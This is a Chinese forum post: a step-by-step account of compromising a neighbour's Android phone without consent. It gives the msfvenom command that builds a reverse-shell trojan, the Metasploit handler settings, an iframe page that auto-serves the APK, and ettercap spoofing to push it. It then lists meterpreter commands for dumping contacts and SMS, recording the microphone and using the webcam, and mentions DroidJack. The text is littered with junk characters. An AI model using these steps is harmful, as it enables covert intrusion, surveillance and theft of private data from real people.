|
% r0 d! r+ D$ X0 O5 r
五、msf+ettercap入侵邻居安卓手机 8 [0 a) `. S& f
8 ]6 @$ s2 C" X4 t w7 |, f/ {
' b: Z, V m% e0 M 首先启动msf
4 Q4 k- T2 }* i 7 D- P4 n( T' M* \' `
) ?9 W+ Q, {- s8 z: d* {5 k 先用kali生成一个安卓木马,如下命令: % E) O \+ z; \& [' x
$ l m* j/ R8 G
! _" v$ ^9 R+ X7 s c! t& t6 V Msfvenom -p android/meterpreter/reverse_tcp LHOST=192.168.0.109 LPORT=44444 -o ~/Desktop/ribenav.apk " }0 M, Z; g' L2 t3 Z1 G7 n
0 {! p! B" o; U
8 w, y- `: @; n' Y! W: h
 为了能让对方下载以后安装我这里将马的名字命名为ribenav.apk,哈哈邻居可是个“大色鬼”,就不适用替换下载的方法了,据我所知,邻居频繁使用手机浏览器浏览新闻
/ Q7 X7 k r1 B7 f; d
8 ^ w% N2 f' W/ ]. y9 b# N
" L9 {- T- s7 [) D( p2 l. M 然后进入msf
# V5 Q! @) D7 O ' C: I6 D4 a( I0 m, d$ I
& n" `; Z3 W5 `4 k% ]5 E- u
use exploit/multi/handler . r3 ?9 O6 K$ k
- u ~% N' j. B
, T% n s! f: [1 ~( v: n set payload android/meterpreter/reverse_tcp
2 A) B0 Q, e9 b7 o6 k- z; a5 j
( P3 x* r1 S$ o0 M7 q3 \. H: |- g9 k
set LHOST 192.168.0.109 //ip为kaili的ip 2 S# V' w9 G6 P5 V
' `: M7 X) O& R+ i3 @
& A `7 Q: o F set LPORT 44444 //端口一定要与前面生成的木马的端口一致 3 |7 [4 f8 { J \3 y
/ M/ J) k, I# W" H+ B
6 e l. C E8 [
Exploit 3 e6 X0 B/ ?# a( u4 [: S
( B2 j( ?+ K( P% K1 h. T% e) a8 _; l) g
0 I+ y+ v$ r% R6 g ) p, N$ t2 _5 C. b4 \) E8 d0 [
3 u6 |! T5 ?0 O0 i. { 下面我们开启ettercap -G
* C. R$ O( [. R) _+ y+ M8 A5 c8 n
4 o( N8 ?: [/ @. y- i4 |
2 A' V5 r# q/ Y 我物理IP为
* ?( N( S3 `) v5 c6 F
# |$ V" }# W7 _' w5 v( T6 N F* z; ~( C- ?+ z; @- ?
- W$ `3 ]5 ^6 b; B8 a; v) B* K
, h& R/ l' S* k9 Q! u/ {
$ U# c- m. s4 B4 { 别到时候再把我物理机欺骗了,之前测试物理机只装腾讯管家是可以成功欺骗的, # u' E" n. b1 ~/ s: C
7 t: ^( J; y' {
" B1 k& [7 Q; j3 R# B
下面我们来设置一下
% X3 c9 k* S: K5 i5 r. H
2 ~( P! J: t, Z( q
( i- B& }3 Z: h" H8 z) Y2 C 
$ T% q& \" l: t
6 ^- Q/ ~8 u' b; C) B' f# H; ^7 F. T
在开启欺骗之前我们先把生成的apk马丢到kaili var/www/html下,并创建一个index.htm文件内容为:<iframe src=http://192.168.0.109/ribenav.apk></iframe>,因为apk文件嘛要想直接提示下载,用iframe语句就OK了,
8 ]" K/ ]- l* p" F ( W( ]& ]* w" L- B+ ]# r! G
$ S0 |- t( Y1 | S! n: G
" Q F5 _- z6 c* V * f$ C, ]2 P- [# `) _% ]
8 s0 O8 m, d, U5 B( D2 w/ l( d) E 
* K/ }- ?& w v4 p, c; z. q( D $ I4 s( k! H; `+ a) T2 M* W
( N$ v/ z3 q q( d3 }
. q* v* D2 C6 l6 |4 y. K5 @ r: c9 ~7 b+ ]3 s
) g6 {2 o* T) T* B/ B. Z' q/ E, v+ B7 {
* }2 U$ h. [9 Z ( U" }7 f. w5 u. e: d% J
1 o) j, \3 A3 Z8 d1 Z% A
8 u! c. `$ I8 H! G8 q : A* u( _! t7 }& t
5 B' o" t& d+ E4 S . o+ y5 w7 V$ S4 q
4 F8 w: W$ F2 ]5 S3 P# d& ?9 P0 P; L
0 M3 g1 a" [2 Q. }/ Y
, ^4 [# j) @: k0 a* x1 F$ X" R0 q w( }3 r9 e( M2 \4 a
- q$ \3 r% g5 k" G
/ {! j/ u7 N1 y2 f+ Q
' |1 {7 L6 v8 W$ D
# A7 X" B% H4 u* t
5 l% [/ j3 P7 R! ^ n! \, E0 @4 m$ Y, ^; l( ?# q# |( j
4 {3 L9 \+ U# I: S
1 p2 | I3 W: ^5 c. _! @3 B/ g
- y0 t& V) R7 R" _
/ R; N; K1 G! ~
! m* @7 T7 v! U8 M- C
0 b4 \. J: i8 B* V& f' e; E
; C8 r! v) a& l% J 6 ]& L- _7 t w* f5 V
- \% u+ D A) G- Z$ R b+ \
4 ?" N2 D9 g( e) B, ~+ y* e
+ _& U- c" U/ Y) m
/ _! x8 |, q3 U: ~& T1 l" L 下面我们开始攻击 0 B. t9 D0 c: c
2 H1 ? d) B/ @1 y0 d/ Q; D* V" n7 s
) i5 s8 ]5 l! N, P
! `- Y1 Q0 }: f3 s& }$ @1 E1 H ! x0 U; X5 J6 [& H9 H; O- I
7 d' C9 p+ M ^3 k
* [% ?% M) E) R+ Z
: z5 N3 r+ \0 f
) Y. W- ~/ R" V, [/ t- Y& w
' P" m% v8 G$ k( l5 U, k5 | % T; y8 S- u. I% ?9 {: |
+ H/ v! G/ {$ @" `! k; a7 H
! X/ @- F9 i& s2 [2 c% t: L P% |/ h . k# S. Q. d" D6 D& H8 U- }! F. H5 E; c
1 B4 l. k4 d* a0 m( a# d5 C 
( k0 V5 O7 K) E G8 D
& s- g" Y+ ?( y; N
2 t( k. O6 R# j 大概过了5分钟多,发现反弹成功了
) W6 l0 N! e1 \- ~
+ ]5 e4 {' `! l/ f q1 D$ ~! k5 r" w: U7 h
3 f2 @; P6 D! q: X+ L- z - \$ a# E1 {8 q- h% G+ g3 p
, I. P7 W# j, L3 I$ L 2 o! J3 a# ~) o8 ~3 W- y; K( r$ ?
2 x* W3 K; r/ l
$ D: a. D$ [9 l : x; S0 [+ H0 E. f! z
, e! r+ {7 u1 Y1 t/ Z, |( _* s+ j
/ o; K5 l) h! a3 G: F7 Q
8 s0 ^4 S" N* b7 a, j( z
7 `- L( s U1 n3 [' L
* [' Y! D" h0 [% ^, y
7 L+ K- m2 l/ z- f# Q; @+ Y7 r2 @, Y" ]! [
' `: W. ~( Y- D& Z
) ?3 @4 M6 I- P+ j0 A) Z) h# j+ o3 s
 " U; Z8 [' {" Z0 r4 z( c' U# z
; ?7 c7 C# B1 x0 g
$ W- Z! n& Z" I1 ^, ` V# Z
执行命令
, j6 O/ y1 ^& X0 O2 S/ ?
8 `0 B# j- p2 z n/ Q4 m" F1 k- b* H+ V j9 G" h
2 |! \3 y9 I7 T
7 w6 W4 c w8 [3 h8 w: y4 o$ H# k& s* Z; H& s+ ?8 u1 K
dump_contacts --》这个是导出电话
3 j6 p1 [9 P- T+ i0 ]. R! s ; i- ?: [+ q! a% x7 M2 m+ P- x
; S! l! }. V- Y) ^) \
dump_sms --》这个是导出信息 2 x! u! e( s2 t
# P9 y4 q- g2 ^) E) x: b' e4 J
) z" f* ` `6 l- w! }0 g5 @9 l0 ` record_mic Record audio from the default microphone for X seconds
! S {& ~ ]/ E( a, J5 Y+ f* }
! m* B$ N$ e9 @0 w
- i3 u/ a. R' ]7 c6 { webcam_chat Start a video chat 0 l4 Q0 F2 U! v
) {, z' }5 m3 i2 C F8 d* t
/ W$ A. B5 R1 h/ U! ~
webcam_list List webcams
) C4 Q- Z" ^: a
/ ^; p( d/ S N$ Q) b1 a% c
r! Z. O7 n$ `# L webcam_snap Take a snapshot from the specified webcam
+ X9 x2 j" ~. p - S5 l6 C4 T" A) |
$ b d* R, [, }% \. M2 [: W webcam_stream  lay a video stream from the specified webcam
* l5 ~; T) F% H* E; n 6 I! }) ^; H- K
5 L) B8 ^% A s) W' x% y( D9 S  2 v* X2 R8 B& Y+ A9 c% n8 K
7 M$ m+ M& T1 }4 r6 W4 c- a3 u/ z. i/ M$ W& e" F
 ! g Y5 Y+ d9 t5 d. c: R2 D
: n. w; G& Q% G
; e/ Z6 |( Z# y' w1 Q4 D. a 我们打开看一下电话薄,
8 n3 k7 w& n& S( g' d$ u {) q( m' e' O! T
0 `' \- b( O2 y B" m. s0 L! J 7 ^* n @; w$ W
8 P9 R9 m2 X5 B, \; `
3 N2 r2 `/ k3 {) k
& e" ~2 c2 x6 ? [, K # J# d1 x0 z, @/ @$ a( |
* N3 p9 S. b5 p: X7 [6 k8 Y; B 4 N1 B; Y0 @- r0 c" U
1 k, K( V$ J L: u
" Z% G; ?6 n. @; j7 @  " ^+ _* ?, r: A" `: E9 K
- ?, O. T5 p1 t: D0 D; n: a* j6 @' E* i4 o: A+ c7 V% I
% n4 c0 N& f& a5 B q, f
& }5 r2 ?) F0 h X9 K* G" @7 b# u. D8 B
1 ~: W3 E+ w+ o2 o/ E
' y8 G+ w! [# M$ C
" n i) `% Q6 N) p) S2 w6 J
我们同时欺骗成DroidJack木马,使用方法如图:
/ m r0 e) \# L: B6 e1 H" ]
- s, {+ m9 v( d
8 x6 m' d8 K5 s/ X: X 
: o9 ?5 A4 h$ q& Y3 O0 J1 U$ ~/ n 6 b& U. P0 k' s3 t, s
@( V: p. g/ y9 G+ s
9 w) ?0 s1 B/ h2 G
2 F& T" ]& f& Y, t' ~% K- H" j5 J H% y: S
 + Q- W: K7 S: K; f1 h* T
4 k! _# t" o8 }* Q7 M6 s3 Z
8 R. R' K" _1 \3 q4 t 切记在前面生成完马以后记得在这里选择开关为on,并且对应前面生成马的时候的端口 1 C! \+ [# m$ M2 q) ^. U3 S0 D8 V3 J8 D
6 ]9 c7 a7 L/ `, h6 u0 _8 h( X) n5 W, d
 7 K6 w9 \3 l7 |! Z( B a6 f5 B
/ G% X# G0 O2 |; h# L
; J9 W+ h; X; h2 y/ e8 h5 h 
2 O- K4 H9 |8 N" \ 2 ?4 F+ K9 M) h: K# T+ [6 J m v: A
' `0 v: z) l5 A2 C 
$ a, ` j) g, C( b+ b# O
4 ~8 ]" c, s2 U& Z2 C
( N1 F. c6 _) A0 g& A0 W0 z  
5 S, \& s4 O- M+ O+ @: Y' f : U S; F) D. X. q9 `3 a) }
$ H1 }7 i& H6 l9 Y- H8 I1 ]
7 g$ l1 w# U2 n, d: b* V0 L
| 
发表于 2018-10-20 20:30:37
收藏
支持
反对